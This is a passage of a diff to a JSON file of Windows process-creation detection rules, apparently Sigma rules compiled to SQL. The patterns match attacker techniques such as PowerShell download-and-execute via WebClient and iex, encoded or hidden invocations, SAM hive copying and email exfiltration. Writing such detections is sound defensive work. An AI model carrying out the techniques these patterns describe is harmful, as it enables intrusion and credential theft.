"proc_creation_win_reg_screensaver.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' 
OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. 
This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.defense_evasion" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects the execution of a renamed binary 
often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Legitimate installations of exchange TransportAgents. 
AssemblyPath is a good indicator for this." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR 
CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", - "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "status": "experimental", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1219" + "attack.t1090" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "title": "Suspicious PowerShell 
Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND 
CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_invocation_specific.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", - "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "status": "test", + "description": "Detects suspicious encoded character syntax often used for defense evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR 
CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", + "title": "Psexec Execution", + "id": "730fc21b-eaff-474b-ad23-90fd265d4988", "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects user accept agreement execution in psexec commandline", + "author": "omkar72", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.execution", + "attack.t1569", + "attack.t1021" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Administrative scripts." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR OriginalFileName = 'psexec.c'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_sysinternals_psexec_execution.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", - "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "title": "Data Copied To Clipboard Via Clip.EXE", + "id": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "status": "test", + "description": "Detects the execution of clip.exe in order to copy data to the clipboard. 
Adversaries may collect data stored in the clipboard from users copying information within or between applications.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\clip.exe' ESCAPE '\\' OR OriginalFileName = 'clip.exe'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_clip_execution.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + 